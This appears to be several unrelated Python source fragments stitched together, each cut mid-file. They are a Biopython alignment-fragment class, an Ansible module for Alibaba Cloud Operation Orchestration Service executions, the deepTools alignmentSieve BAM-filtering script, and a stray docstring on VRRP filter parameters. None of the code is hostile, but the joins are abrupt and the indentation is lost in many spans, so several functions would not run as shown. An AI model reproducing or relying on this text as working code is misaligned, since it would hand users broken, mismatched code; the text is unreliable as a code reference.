DNAAlphabet() alignment with 2 rows and 61 columns
CCCTCTACAGGGAAGCGCTTTCTGTTGTCTGAAAGAAAAGAAAG...GGG 33211
CCCTCTACAGGGAAGCGCTTTCTGTTGTCTGAAAGAAAAGAAAG...GGG gi|262205317|ref|NR_030195.1|
"""
def __init__(self, hit_id='<unknown id>', query_id='<unknown id>',
hit=None, query=None, alphabet=single_letter_alphabet):
"""Initialize the class."""
self._alphabet = alphabet
self.aln_annotation = {}
self._hit_id = hit_id
self._query_id = query_id
for seq_type in ('query', 'hit'):
# query or hit attributes default attributes
setattr(self, '_%s_description' % seq_type, '<unknown description>')
setattr(self, '_%s_features' % seq_type, [])
# query or hit attributes whose default attribute is None
for attr in ('strand', 'frame', 'start', 'end'):
setattr(self, '%s_%s' % (seq_type, attr), None)
# self.query or self.hit
if eval(seq_type):
setattr(self, seq_type, eval(seq_type))
else:
setattr(self, seq_type, None)
def __repr__(self):
info = "hit_id=%r, query_id=%r" % (self.hit_id, self.query_id)
try:
info += ", %i columns" % len(self)
except AttributeError:
pass
return "%s(%s)" % (self.__class__.__name__, info)
    def __len__(self):
        # fragment length == number of alignment columns (gaps included)
        return self.aln_span
    def __str__(self):
        # header (IDs, coordinate ranges) followed by the alignment display
        return self._str_hsp_header() + '\n' + self._str_aln()
    def __getitem__(self, idx):
        """Slice the fragment's alignment columns into a new HSPFragment.

        Requires at least one of query/hit to be present (``aln`` not None);
        raises TypeError otherwise.
        """
        if self.aln is not None:
            obj = self.__class__(
                hit_id=self.hit_id, query_id=self.query_id,
                alphabet=self.alphabet)
            # transfer query and hit attributes
            # let SeqRecord handle feature slicing, then retrieve the sliced
            # features into the sliced HSPFragment
            if self.query is not None:
                obj.query = self.query[idx]
                obj.query_features = obj.query.features
            if self.hit is not None:
                obj.hit = self.hit[idx]
                obj.hit_features = obj.hit.features
            # description, strand, frame
            for attr in ('description', 'strand', 'frame'):
                for seq_type in ('hit', 'query'):
                    attr_name = '%s_%s' % (seq_type, attr)
                    self_val = getattr(self, attr_name)
                    setattr(obj, attr_name, self_val)
            # alignment annotation should be transferred, since we can compute
            # the resulting annotation
            obj.aln_annotation = {}
            for key, value in self.aln_annotation.items():
                # sliced annotation must stay column-aligned with the fragment
                assert len(value[idx]) == len(obj)
                obj.aln_annotation[key] = value[idx]
            return obj
        else:
            raise TypeError("Slicing for HSP objects without "
                            "alignment is not supported.")
    def _str_aln(self):
        """Build the multi-line alignment display used by __str__ (PRIVATE).

        Sequences longer than 67 columns are elided in the middle with '~'
        continuation characters.
        """
        lines = []
        # alignment length
        aln_span = getattr_str(self, 'aln_span')
        lines.append(' Fragments: 1 (%s columns)' % aln_span)
        # sequences
        if self.query is not None and self.hit is not None:
            try:
                qseq = str(self.query.seq)
            except AttributeError: # query is None
                qseq = '?'
            try:
                hseq = str(self.hit.seq)
            except AttributeError: # hit is None
                hseq = '?'
            # similarity line
            simil = ''
            if 'similarity' in self.aln_annotation and \
                    isinstance(self.aln_annotation.get('similarity'), basestring):
                simil = self.aln_annotation['similarity']
            if self.aln_span <= 67:
                # short enough to show in full
                lines.append("%10s - %s" % ('Query', qseq))
                if simil:
                    lines.append(" %s" % simil)
                lines.append("%10s - %s" % ('Hit', hseq))
            else:
                # adjust continuation character length, so we don't display
                # the same residues twice
                if self.aln_span - 66 > 3:
                    cont = '~' * 3
                else:
                    cont = '~' * (self.aln_span - 66)
                lines.append("%10s - %s%s%s" % ('Query',
                                                qseq[:59], cont, qseq[-5:]))
                if simil:
                    lines.append(" %s%s%s" %
                                 (simil[:59], cont, simil[-5:]))
                lines.append("%10s - %s%s%s" % ('Hit',
                                                hseq[:59], cont, hseq[-5:]))
        return '\n'.join(lines)
# sequence properties #
    def _set_seq(self, seq, seq_type):
        """Check and normalize the given sequence for attribute setting (PRIVATE).

        :param seq: sequence to check; plain strings are wrapped into a new
            SeqRecord, SeqRecord inputs are adjusted in place
        :type seq: string or SeqRecord
        :param seq_type: sequence type
        :type seq_type: string, choice of 'hit' or 'query'

        Returns a SeqRecord carrying this fragment's id, description,
        features and alphabet, or None when ``seq`` is None.
        """
        assert seq_type in ('hit', 'query')
        if seq is None:
            return seq # return immediately if seq is None
        else:
            if not isinstance(seq, (basestring, SeqRecord)):
                raise TypeError("%s sequence must be a string or a SeqRecord"
                                " object." % seq_type)
        # check length if the opposite sequence is not None
        opp_type = 'hit' if seq_type == 'query' else 'query'
        opp_seq = getattr(self, '_%s' % opp_type, None)
        if opp_seq is not None:
            if len(seq) != len(opp_seq):
                raise ValueError("Sequence lengths do not match. Expected: "
                                 "%r (%s); found: %r (%s)." % (len(opp_seq), opp_type,
                                                               len(seq), seq_type))
        # stamp the fragment's identity onto the record
        seq_id = getattr(self, '%s_id' % seq_type)
        seq_desc = getattr(self, '%s_description' % seq_type)
        seq_feats = getattr(self, '%s_features' % seq_type)
        seq_name = 'aligned %s sequence' % seq_type
        if isinstance(seq, SeqRecord):
            seq.id = seq_id
            seq.description = seq_desc
            seq.name = seq_name
            seq.features = seq_feats
            seq.seq.alphabet = self.alphabet
        elif isinstance(seq, basestring):
            # wrap a bare string into a SeqRecord with this fragment's metadata
            seq = SeqRecord(Seq(seq, self.alphabet), id=seq_id, name=seq_name,
                            description=seq_desc, features=seq_feats)
        return seq
    def _hit_get(self):
        # plain accessor; normalization happens in the setter
        return self._hit
    def _hit_set(self, value):
        # validate/normalize via _set_seq (string -> SeqRecord, length check)
        self._hit = self._set_seq(value, 'hit')
    hit = property(fget=_hit_get, fset=_hit_set,
                   doc="""Hit sequence as a SeqRecord object, defaults to None""")
    def _query_get(self):
        # plain accessor; normalization happens in the setter
        return self._query
    def _query_set(self, value):
        # validate/normalize via _set_seq (string -> SeqRecord, length check)
        self._query = self._set_seq(value, 'query')
    query = property(fget=_query_get, fset=_query_set,
                     doc="""Query sequence as a SeqRecord object, defaults to None""")
def _aln_get(self):
if self.query is None and self.hit is None:
return None
elif self.hit is None:
return MultipleSeqAlignment([self.query], self.alphabet)
elif self.query is None:
return MultipleSeqAlignment([self.hit], self.alphabet)
else:
return MultipleSeqAlignment([self.query, self.hit], self.alphabet)
aln = property(fget=_aln_get,
doc="""Query-hit alignment as a MultipleSeqAlignment object,
defaults to None""")
    def _alphabet_get(self):
        return self._alphabet
    def _alphabet_set(self, value):
        # store and propagate the new alphabet to both sequences;
        # AttributeError means the sequence is None and can be skipped
        self._alphabet = value
        try:
            self.query.seq.alphabet = value
        except AttributeError:
            pass
        try:
            self.hit.seq.alphabet = value
        except AttributeError:
            pass
    alphabet = property(fget=_alphabet_get, fset=_alphabet_set,
                        doc="""Alphabet object used in the fragment's sequences and alignment,
                        defaults to single_letter_alphabet""")
    def _aln_span_get(self):
        # length of alignment (gaps included)
        # alignment span can be its own attribute, or computed from
        # query / hit length
        if not hasattr(self, '_aln_span'):
            if self.query is not None:
                self._aln_span = len(self.query)
            elif self.hit is not None:
                self._aln_span = len(self.hit)
        # NOTE: raises AttributeError when both sequences are None and the
        # span was never set explicitly (callers such as __repr__ handle it)
        return self._aln_span
    def _aln_span_set(self, value):
        self._aln_span = value
    aln_span = property(fget=_aln_span_get, fset=_aln_span_set,
                        doc="""The number of alignment columns covered by the fragment""")
# id, description, and features properties #
hit_description = fragcascade('description', 'hit',
doc="""Hit sequence description""")
query_description = fragcascade('description', 'query',
doc="""Query sequence description""")
hit_id = fragcascade('id', 'hit',
doc="""Hit sequence ID""")
query_id = fragcascade('id', 'query',
doc="""Query sequence ID""")
hit_features = fragcascade('features', 'hit',
doc="""Hit sequence features""")
query_features = fragcascade('features', 'query',
doc="""Query sequence features""")
# strand properties #
def _prep_strand(self, strand):
# follow SeqFeature's convention
if strand not in (-1, 0, 1, None):
raise ValueError("Strand should be -1, 0, 1, or None; not %r" %
strand)
return strand
    def _get_strand(self, seq_type):
        """Return the strand for the given sequence type (PRIVATE).

        When the strand was never set explicitly it is derived from the
        reading frame (sign of the frame; frame 0 -> strand 0) and cached
        through the strand property setter.
        """
        assert seq_type in ('hit', 'query')
        strand = getattr(self, '_%s_strand' % seq_type)
        if strand is None:
            # try to compute strand from frame
            frame = getattr(self, '%s_frame' % seq_type)
            if frame is not None:
                try:
                    strand = frame // abs(frame)
                except ZeroDivisionError:
                    strand = 0
                setattr(self, '%s_strand' % seq_type, strand)
        return strand
    def _hit_strand_get(self):
        # may lazily derive the strand from hit_frame (see _get_strand)
        return self._get_strand('hit')
    def _hit_strand_set(self, value):
        self._hit_strand = self._prep_strand(value)
    hit_strand = property(fget=_hit_strand_get, fset=_hit_strand_set,
                          doc="""Hit sequence strand, defaults to None""")
    def _query_strand_get(self):
        # may lazily derive the strand from query_frame (see _get_strand)
        return self._get_strand('query')
    def _query_strand_set(self, value):
        self._query_strand = self._prep_strand(value)
    query_strand = property(fget=_query_strand_get, fset=_query_strand_set,
                            doc="""Query sequence strand, defaults to None""")
# frame properties #
def _prep_frame(self, frame):
if frame not in (-3, -2, -1, 0, 1, 2, 3, None):
raise ValueError("Strand should be an integer between -3 and 3, "
"or None; not %r" % frame)
return frame
    def _hit_frame_get(self):
        # reading frame of the hit sequence (-3..3 or None)
        return self._hit_frame
    def _hit_frame_set(self, value):
        # validate via _prep_frame before storing
        self._hit_frame = self._prep_frame(value)
hit_frame = property(fget=_hit_frame_get, fset=_hit_frame_set,
doc="""Hit sequence reading frame, defaults | |
<gh_stars>10-100
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2017-present Alibaba Group Holding Limited. <NAME> <<EMAIL>>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see http://www.gnu.org/licenses/.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
# Standard Ansible module metadata: schema version 1.1, preview status,
# maintained by the community.
ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['preview'],
                    'supported_by': 'community'}
DOCUMENTATION = """
---
module: ali_oos_execution
short_description: Configure Execution Alibaba Cloud Operation Orchestration Service(OOS)
description:
- Create, Delete, Notify, Cancel Execution.
options:
state:
description:
- If I(state=present), execution will be started.
- If I(state=absent), execution will be deleted.
- If I(state=cancel), execution will be canceled.
- If I(state=notify), It will notify a pending execution of how to run next.
choices: ['present', 'absent', 'cancel', 'notify']
type: str
default: 'present'
task_execution_id:
description:
- The id of task execution.
type: str
task_name:
description:
- The name of task execution.
type: str
notify_note:
description:
- The note of notify.
type: str
loop_item:
description:
- Loop child nodes corresponding to Item data.
type: str
execution_status:
description:
- The status of execution.
- Required when C(notify_type=CompleteExecution)
type: str
notify_type:
description:
- The type of notify.
- If C(notify_type=Approve), approval of pending execution. If you know the execution risks of high-risk operations, and allow them to perform.
- If C(notify_type=Reject), reject execution pending approval. If high-risk operations are not allowed to perform tasks.
- If C(notify_type=ExecuteTask), specifies the start of the execution of a task, suitable for Debug mode. May need to cooperate with I(parameters).
- If C(notify_type=CancelTask), cancel current task execution, applicable to when C(mode=Debug).
- If C(notify_type=CompleteExecution), manually terminate execution in a debug mode. Can be used with the I(execution_status) to specify the status of execution termination.
choices: ['Approve', 'Reject', 'ExecuteTask', 'CancelTask', 'CompleteExecution']
type: str
executed_by:
description:
- The user executed execution.
      - when you want to cancel, delete or notify executions, you can pass it to filter executions, except it,
filter params supported include (I(template_name), I(status), I(execution_ids))
type: str
status:
description:
- The status of execution.
      - when you want to cancel, delete or notify executions, you can pass it to filter executions, except it,
filter params supported include (I(template_name), I(executed_by), I(execution_ids))
type: str
safety_check:
description:
- Security check mode.
- If C(safety_check=Skip), means that the customer understands the risk and can perform any action without confirmation,
regardless of the level of risk. Effective when C(mode=Automatic).
- If C(safety_check=ConfirmEveryHighRiskAction), will ask the customer to confirm each high-risk action.
The client confirms or cancels by calling the NotifyExecution interface.
type: str
default: ConfirmEveryHighRiskAction
choices: ['Skip', 'ConfirmEveryHighRiskAction']
parent_execution_id:
description:
- The id of parent execution.
type: str
parameters:
description:
- Consists of a collection of parameters.
type: dict
mode:
description:
- The execution mode.
type: str
choices: ['Debug', 'Automatic']
loop_mode:
description:
- The Loop mode.
type: str
template_name:
description:
- The name of template.
- When you want to start an execution, it is required.
- When you want to cancel, delete or notify executions, you can pass it to filter executions. Besides it,
supported filter params include (I(status), I(executed_by), I(execution_ids))
type: str
description:
description:
- The description of execution.
type: str
execution_ids:
description:
- The ids of executions.
- When you want to cancel, delete or notify executions, you can pass it to filter executions. Besides it,
supported filter params include (I(status), I(executed_by), I(template_name))
type: list
elements: str
tags:
description:
- A hash/dictionaries of template tags. C({"key":"value"})
type: dict
requirements:
- "python >= 3.6"
- "footmark >= 1.20.0"
extends_documentation_fragment:
- alicloud
author:
- "<NAME> (@xiaozhu36)"
- "<NAME> (@lixue323)"
"""
EXAMPLES = """
# Note: These examples do not set authentication details, see the Alibaba Cloud Guide for details.
- name: Changed. Start a timed execution that starts and closes instances
ali_oos_execution:
template_name: 'ACS-ECS-ScheduleToStartAndStopInstances'
safety_check: Skip
description: test execution from ansible
parameters:
dailyStartTime: 08:00:00Z
dailyStopTime: dailyStopTime
weekdays: '2'
targets:
Type: ResourceIds
ResourceIds:
- 'instances_id'
tags:
From: ansible
- name: Changed. cancel a timed execution
ali_oos_execution:
state: cancel
template_name: 'ACS-ECS-ScheduleToStartAndStopInstances'
- name: Changed. Delete a execution
ali_oos_execution:
state: absent
template_name: 'ACS-ECS-ScheduleToStartAndStopInstances'
- name: Changed. Start a risky execution that deletes instances
ali_oos_execution:
template_name: 'ACS-ECS-BulkyDeleteInstances'
description: test execution from ansible
parameters:
force: true
targets:
Type: ResourceIds
ResourceIds:
- 'instances_id'
- name: Changed. notify a execution
ali_oos_execution:
state: notify
notify_type: Approve
template_name: 'ACS-ECS-BulkyDeleteInstances'
- name: Changed. Delete a execution
ali_oos_execution:
state: absent
template_name: 'ACS-ECS-BulkyDeleteInstances'
"""
RETURN = '''
executions:
description: Info about the executions that were started or notified.
returned: always
type: complex
contains:
execution_id:
description: The id of execution.
returned: always
type: str
sample: exec-xxxyyy
id:
description: aliases of execution_id.
returned: always
type: str
sample: exec-xxxyyy
is_parent:
description: Have child task or not.
returned: always
type: bool
sample: false
loop_mode:
description: The loop mode.
returned: always
type: str
sample: Automatic
mode:
description: mode of execution.
returned: always
type: str
sample: Automatic
out_puts:
description: The output of execution.
returned: always
type: str
sample: {"InstanceId":"i-xxx"}
parameters:
description: The parameters of execution.
returned: always
type: str
sample: {"Status":"Running"}
parent_execution_id:
description: The id of parent execution.
returned: always
type: str
sample: exec-xxxx
ram_role:
description: The ram role of execution.
returned: always
type: str
sample: OOSServiceRole
safety_check:
description: The security check mode.
returned: always
type: str
sample: Skip
description:
description: The description of execution.
returned: always
type: str
sample: run instance
start_date:
description: The start date of the execution.
returned: always
type: str
sample: "2019-05-16T10:26:14Z"
status:
description: The status of the execution.
returned: always
type: str
sample: Success
status_message:
description: The message of the status.
returned: always
type: str
sample: ""
template_id:
description: The id of the template.
returned: always
type: str
sample: t-1bd341007f
template_name:
description: The name of the template.
returned: always
type: str
sample: MyTemplate
template_version:
description: The version of template.
returned: always
type: str
sample: v1
update_date:
description: The update date of template.
returned: always
type: str
sample: "2019-05-16T10:26:14Z"
executed_by:
description: The template executor.
returned: always
type: str
sample: root(13092080xx12344)
end_date:
description: The end date of execution.
returned: always
type: str
sample: "2019-05-16T10:26:14Z"
task_name:
description: The name of task.
returned: always
type: str
sample: waitForReady
task_execution_id:
description: The id of task execution.
returned: always
type: str
sample: exec-xxxyyy.0001
task_action:
description: The action of task.
returned: always
type: str
sample: ACS::WaitFor
'''
import time
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.alicloud_ecs import ecs_argument_spec, oos_connect
HAS_FOOTMARK = False
try:
from footmark.exception import OOSResponseError
HAS_FOOTMARK = True
except ImportError:
HAS_FOOTMARK = False
def executions_exists(module, oos_conn):
    """Look up OOS executions matching the module parameters.

    Executions are matched either by the explicit ``execution_ids`` list or,
    failing that, by the pre-built filter dict stored in
    ``module.params['params']`` (template_name / status / executed_by, built
    by ``main()``). The module is failed when nothing matches or the API
    raises.

    :param module: the AnsibleModule instance (used for params and error
        reporting via ``fail_json``)
    :param oos_conn: a footmark OOS connection exposing ``list_executions``
    :returns: list of ids of the matching executions
    """
    try:
        executions = []
        execution_ids = module.params.get('execution_ids')
        if execution_ids:
            # The API filters by a single execution_id per call, so look each
            # requested execution up individually.
            for execution_id in execution_ids:
                executions.extend(oos_conn.list_executions(execution_id=execution_id))
        elif module.params.get('params'):
            executions.extend(oos_conn.list_executions(**module.params['params']))
        if not executions:
            module.fail_json(msg="Failed to list executions, please make sure your params are correct")
        return [e.id for e in executions]
    except Exception as e:
        # Fixed: the original message said "templates" although this helper
        # lists executions, which made failures confusing to diagnose.
        module.fail_json(msg="Failed to list executions: {0}".format(e))
def main():
argument_spec = ecs_argument_spec()
argument_spec.update(dict(
state=dict(default='present', choices=['present', 'absent', 'cancel', 'notify']),
execution_ids=dict(type='list', elements='str'),
description=dict(type='str'),
template_name=dict(type='str', aliases=['name']),
loop_mode=dict(type='str'),
mode=dict(type='str', choices=['Debug', 'Automatic']),
parameters=dict(type='dict'),
parent_execution_id=dict(type='str'),
safety_check=dict(type='str', default='ConfirmEveryHighRiskAction', choices=['Skip', 'ConfirmEveryHighRiskAction']),
tags=dict(type='dict'),
status=dict(type='str'),
executed_by=dict(type='str'),
notify_type=dict(type='str', choices=['Approve', 'Reject', 'ExecuteTask', 'CancelTask', 'CompleteExecution']),
execution_status=dict(type='str'),
loop_item=dict(type='str'),
notify_note=dict(type='str'),
task_execution_id=dict(type='str'),
task_name=dict(type='str')
))
module = AnsibleModule(argument_spec=argument_spec)
if HAS_FOOTMARK is False:
module.fail_json(msg='footmark required for this module.')
oos_conn = oos_connect(module)
# Get values of variable
state = module.params['state']
template_name = module.params['template_name']
status = module.params['status']
executed_by = module.params['executed_by']
params = {}
if template_name:
params['template_name'] = template_name
if status:
params['status'] = status
if executed_by:
params['executed_by'] = executed_by
changed = False
if params:
module.params['params'] = params
if state == 'absent':
ids = executions_exists(module, oos_conn)
try:
if oos_conn.delete_executions(execution_ids=ids):
changed = True
module.exit_json(changed=changed, executions={})
except OOSResponseError as e:
module.fail_json(msg='Unable to delete executions {0}, error: {1}'.format(str(ids), e))
elif state == | |
<gh_stars>100-1000
#!/usr/bin/env python
import argparse
import pysam
import os
import sys
from deeptools import parserCommon
from deeptools.bamHandler import openBam
from deeptools.mapReduce import mapReduce
from deeptools._version import __version__
from deeptools.utilities import getTLen, smartLabels, getTempFileName
def parseArguments():
    """Build the command-line parser for alignmentSieve.

    The options fall into four argparse groups:
      * required  -- the input BAM/CRAM file and the output file
      * general   -- processing (threads, labels, metrics) and read shifting
      * output    -- BEDPE instead of BAM output
      * filtering -- criteria deciding which reads/fragments are kept

    :returns: a configured ``argparse.ArgumentParser`` (arguments not yet parsed).
    """
    parser = argparse.ArgumentParser(
        formatter_class=argparse.RawDescriptionHelpFormatter,
        description="This tool filters alignments in a BAM/CRAM file according the the specified parameters. It can optionally output to BEDPE format.",
        usage='Example usage: alignmentSieve.py -b sample1.bam -o sample1.filtered.bam --minMappingQuality 10 --filterMetrics log.txt')

    # Input/output files that must always be given.
    required = parser.add_argument_group('Required arguments')
    required.add_argument('--bam', '-b',
                          metavar='FILE1',
                          help='An indexed BAM file.',
                          required=True)
    required.add_argument('--outFile', '-o',
                          help='The file to write results to. These are the alignments or fragments that pass the filtering criteria.')

    # Processing, labelling and end-shifting options.
    general = parser.add_argument_group('General arguments')
    general.add_argument('--numberOfProcessors', '-p',
                         help='Number of processors to use. Type "max/2" to '
                         'use half the maximum number of processors or "max" '
                         'to use all available processors. (Default: %(default)s)',
                         metavar="INT",
                         type=parserCommon.numberOfProcessors,
                         default=1,
                         required=False)
    general.add_argument('--filterMetrics',
                         metavar="FILE.log",
                         help="The number of entries in total and filtered are saved to this file")
    general.add_argument('--filteredOutReads',
                         metavar="filtered.bam",
                         help="If desired, all reads NOT passing the filtering criteria can be written to this file.")
    general.add_argument('--label', '-l',
                         metavar='sample1',
                         help='User defined label instead of the default label '
                         '(file name).')
    general.add_argument('--smartLabels',
                         action='store_true',
                         help='Instead of manually specifying a labels for the input '
                         'file, this causes deepTools to use the file name '
                         'after removing the path and extension.')
    general.add_argument('--verbose', '-v',
                         help='Set to see processing messages.',
                         action='store_true')
    general.add_argument('--version', action='version',
                         version='%(prog)s {}'.format(__version__))
    # --shift accepts 2 or 4 integers; see shiftRead() for how they are applied.
    general.add_argument('--shift',
                         nargs='+',
                         type=int,
                         help='Shift the left and right end of a read (for BAM files) or a fragment (for BED files). A positive value shift an end to the right (on the + strand) and a negative value shifts a fragment to the left. Either 2 or 4 integers can be provided. For example, "2 -3" will shift the left-most fragment end two bases to the right and the right-most end 3 bases to the left. If 4 integers are provided, then the first and last two refer to fragments whose read 1 is on the left or right, respectively. Consequently, it is possible to take strand into consideration for strand-specific protocols. A fragment whose length falls below 1 due to shifting will not be written to the output. See the online documentation for graphical examples. Note that non-properly-paired reads will be filtered.')
    general.add_argument('--ATACshift',
                         action='store_true',
                         help='Shift the produced BAM file or BEDPE regions as commonly done for ATAC-seq. This is equivalent to --shift 4 -5 5 -4.')

    # Output format selection.
    output = parser.add_argument_group('Output arguments')
    output.add_argument('--BED',
                        action='store_true',
                        help='Instead of producing BAM files, write output in BEDPE format (as defined by MACS2). Note that only reads/fragments passing filtering criterion are written in BEDPE format.')

    # Read/fragment filtering criteria applied by filterWorker().
    filtering = parser.add_argument_group('Optional arguments')
    filtering.add_argument('--filterRNAstrand',
                           help='Selects RNA-seq reads (single-end or paired-end) in '
                           'the given strand. (Default: %(default)s)',
                           choices=['forward', 'reverse'],
                           default=None)
    filtering.add_argument('--ignoreDuplicates',
                           help='If set, reads that have the same orientation '
                           'and start position will be considered only '
                           'once. If reads are paired, the mate\'s position '
                           'also has to coincide to ignore a read.',
                           action='store_true')
    filtering.add_argument('--minMappingQuality',
                           metavar='INT',
                           help='If set, only reads that have a mapping '
                           'quality score of at least this are '
                           'considered.',
                           type=int)
    filtering.add_argument('--samFlagInclude',
                           help='Include reads based on the SAM flag. For example, '
                           'to get only reads that are the first mate, use a flag of 64. '
                           'This is useful to count properly paired reads only once, '
                           'as otherwise the second mate will be also considered for the '
                           'coverage.',
                           metavar='INT',
                           default=None,
                           type=int,
                           required=False)
    filtering.add_argument('--samFlagExclude',
                           help='Exclude reads based on the SAM flag. For example, '
                           'to get only reads that map to the forward strand, use '
                           '--samFlagExclude 16, where 16 is the SAM flag for reads '
                           'that map to the reverse strand.',
                           metavar='INT',
                           default=None,
                           type=int,
                           required=False)
    filtering.add_argument('--blackListFileName', '-bl',
                           help="A BED or GTF file containing regions that should be excluded from all analyses. Currently this works by rejecting genomic chunks that happen to overlap an entry. Consequently, for BAM files, if a read partially overlaps a blacklisted region or a fragment spans over it, then the read/fragment might still be considered. Please note that you should adjust the effective genome size, if relevant.",
                           metavar="BED file",
                           nargs="+",
                           required=False)
    filtering.add_argument('--minFragmentLength',
                           help='The minimum fragment length needed for read/pair '
                           'inclusion. This option is primarily useful '
                           'in ATACseq experiments, for filtering mono- or '
                           'di-nucleosome fragments. (Default: %(default)s)',
                           metavar='INT',
                           default=0,
                           type=int,
                           required=False)
    filtering.add_argument('--maxFragmentLength',
                           help='The maximum fragment length needed for read/pair '
                           'inclusion. A value of 0 indicates no limit. (Default: %(default)s)',
                           metavar='INT',
                           default=0,
                           type=int,
                           required=False)
    return parser
def shiftRead(b, chromDict, args):
    """Return a copy of read ``b`` with its ends shifted per ``args.shift``.

    :param b: a ``pysam.AlignedSegment`` to shift
    :param chromDict: mapping of chromosome name -> chromosome length, used to
        clip shifted coordinates to the reference bounds
    :param args: parsed arguments; ``args.shift`` is indexed at positions 0-3
        below, so it is presumably already expanded to 4 values by the caller
        (the CLI accepts either 2 or 4 integers) -- TODO confirm against the
        caller.
    :returns: a new ``pysam.AlignedSegment`` with shifted coordinates, an
        all-match CIGAR and an adjusted template length, or ``None`` for
        non-properly-paired reads and fragments whose length would fall below
        1 base after shifting.
    """
    # Only properly-paired reads are shifted; everything else is dropped.
    if not b.is_proper_pair:
        return None
    # Signed template length; its sign selects how deltaTLen is applied below.
    tLen = getTLen(b, notAbs=True)
    start = b.pos
    end = start + b.query_alignment_end
    # Pick the shift offsets by strand and mate number. shift[0]/shift[1]
    # adjust one fragment orientation, shift[2]/shift[3] the other.
    if b.is_reverse and not b.is_read2:
        end -= args.shift[2]
        deltaTLen = args.shift[3] - args.shift[2]
    elif b.is_reverse and b.is_read2:
        end += args.shift[1]
        deltaTLen = args.shift[1] - args.shift[0]
    elif not b.is_reverse and not b.is_read2:
        start += args.shift[0]
        deltaTLen = args.shift[1] - args.shift[0]
    else:
        start -= args.shift[3]
        deltaTLen = args.shift[3] - args.shift[2]
    # Sanity check: keep at least a 1-base interval, anchored at the 5' end
    # that was not shifted past its mate.
    if end - start < 1:
        if b.is_reverse:
            start = end - 1
        else:
            end = start + 1
    # Clip to the chromosome bounds.
    if start < 0:
        start = 0
    if end > chromDict[b.reference_name]:
        end = chromDict[b.reference_name]
    if end - start < 1:
        return None
    # create a new read rather than mutating the input segment
    b2 = pysam.AlignedSegment()
    b2.query_name = b.query_name
    b2.flag = b.flag
    b2.reference_id = b.reference_id
    b2.reference_start = start
    b2.mapping_quality = b.mapping_quality
    b2.cigar = ((0, end - start),)  # Returned cigar is only matches
    # Widen/narrow TLEN by the net shift, preserving its sign convention.
    if tLen < 0:
        b2.template_length = tLen - deltaTLen
    else:
        b2.template_length = tLen + deltaTLen
    b2.next_reference_id = b.next_reference_id
    b2.next_reference_start = b.next_reference_start
    # Keep the recorded mate start consistent with the shift the mate itself
    # will receive when it is processed.
    if b.is_proper_pair:
        if b2.is_read2 and b2.is_reverse:
            b2.next_reference_start += args.shift[0]
        elif not b2.is_read2 and b2.is_reverse:
            b2.next_reference_start -= args.shift[3]
    return b2
def filterWorker(arglist):
chrom, start, end, args, chromDict = arglist
fh = openBam(args.bam)
mode = 'wbu'
oname = getTempFileName(suffix='.bam')
if args.filteredOutReads:
onameFiltered = getTempFileName(suffix='.bam')
else:
onameFiltered = None
ofh = pysam.AlignmentFile(oname, mode=mode, template=fh)
if onameFiltered:
ofiltered = pysam.AlignmentFile(onameFiltered, mode=mode, template=fh)
else:
ofiltered = None
prev_pos = set()
lpos = None
nFiltered = 0
total = 0
for read in fh.fetch(chrom, start, end):
if read.pos < start:
# ensure that we never double count (in case distanceBetweenBins == 0)
continue
total += 1
if read.flag & 4:
# Ignore unmapped reads, they were counted already
nFiltered += 1
if ofiltered:
ofiltered.write(read)
continue
if args.minMappingQuality and read.mapq < args.minMappingQuality:
nFiltered += 1
if ofiltered:
ofiltered.write(read)
continue
if args.samFlagInclude and read.flag & args.samFlagInclude != args.samFlagInclude:
nFiltered += 1
if ofiltered:
ofiltered.write(read)
continue
if args.samFlagExclude and read.flag & args.samFlagExclude != 0:
nFiltered += 1
if ofiltered:
ofiltered.write(read)
continue
tLen = getTLen(read)
if args.minFragmentLength > 0 and tLen < args.minFragmentLength:
nFiltered += 1
if ofiltered:
ofiltered.write(read)
continue
if args.maxFragmentLength > 0 and tLen > args.maxFragmentLength:
nFiltered += 1
if ofiltered:
ofiltered.write(read)
continue
if args.ignoreDuplicates:
# Assuming more or less concordant reads, use the fragment bounds, otherwise the start positions
if tLen >= 0:
s = read.pos
e = s + tLen
else:
s = read.pnext
e = s - tLen
if read.reference_id != read.next_reference_id:
e = read.pnext
if lpos is not None and lpos == read.reference_start \
and (s, e, read.next_reference_id, read.is_reverse) in prev_pos:
nFiltered += 1
if ofiltered:
ofiltered.write(read)
continue
if lpos != read.reference_start:
prev_pos.clear()
lpos = read.reference_start
prev_pos.add((s, e, read.next_reference_id, read.is_reverse))
# filterRNAstrand
if args.filterRNAstrand:
if read.is_paired:
if args.filterRNAstrand == 'forward':
if read.flag & 144 == 128 or read.flag & 96 == 64:
pass
else:
nFiltered += 1
if ofiltered:
ofiltered.write(read)
continue
elif args.filterRNAstrand == 'reverse':
if read.flag & 144 == 144 or read.flag & 96 == 96:
pass
else:
nFiltered += 1
if ofiltered:
ofiltered.write(read)
continue
else:
if args.filterRNAstrand == 'forward':
if read.flag & 16 == 16:
pass
else:
nFiltered += 1
if ofiltered:
ofiltered.write(read)
continue
elif args.filterRNAstrand == 'reverse':
if read.flag & 16 == 0:
pass
else:
nFiltered += 1
if ofiltered:
ofiltered.write(read)
continue
if args.shift:
read = shiftRead(read, chromDict, args)
if not read:
continue
# Read survived filtering
ofh.write(read)
# The results from the workers will get sorted, so get the | |
specified.
:type val_f_VrrpAdvertiseIntervalErrors: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VrrpAdvertiseIntervalErrors: If op_VrrpAdvertiseIntervalErrors is specified, this value will be compared to the value in VrrpAdvertiseIntervalErrors using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VrrpAdvertiseIntervalErrors must be specified if op_VrrpAdvertiseIntervalErrors is specified.
:type val_c_VrrpAdvertiseIntervalErrors: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
